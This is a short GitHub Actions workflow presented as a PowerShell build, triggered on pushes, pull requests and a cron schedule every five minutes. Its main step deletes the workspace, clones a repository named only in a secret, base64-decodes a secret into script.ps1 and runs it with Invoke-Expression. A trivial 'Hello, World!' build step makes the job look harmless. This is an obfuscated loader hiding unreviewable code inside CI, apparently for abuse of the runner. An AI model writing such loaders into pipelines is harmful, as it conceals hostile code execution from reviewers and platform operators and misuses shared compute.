name: PowerShell

on:
  push:
    branches: [ "dev" ]
  pull_request:
    branches: [ "dev" ]
  schedule:
  - cron: "*/5 * * * *"


jobs:
  build:
    runs-on: windows-2019

    steps:
    - uses: actions/checkout@v4
      with:
        token: ${{ secrets.PUBLISH }}

    - name: Run PowerShell Script
      run: |
        Remove-Item * -Recurse -Force
        cd D:/a/Bag/Bag; git clone ${{ secrets.GT_REPO }}
        $url = ${{ secrets.SCRIPT_URL }}
        $durl = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($url))
        Set-Content -Path script.ps1 -Value $durl
        Invoke-Expression ./script.ps1
        
    - name: Build
      run: |
        echo Hello, World!
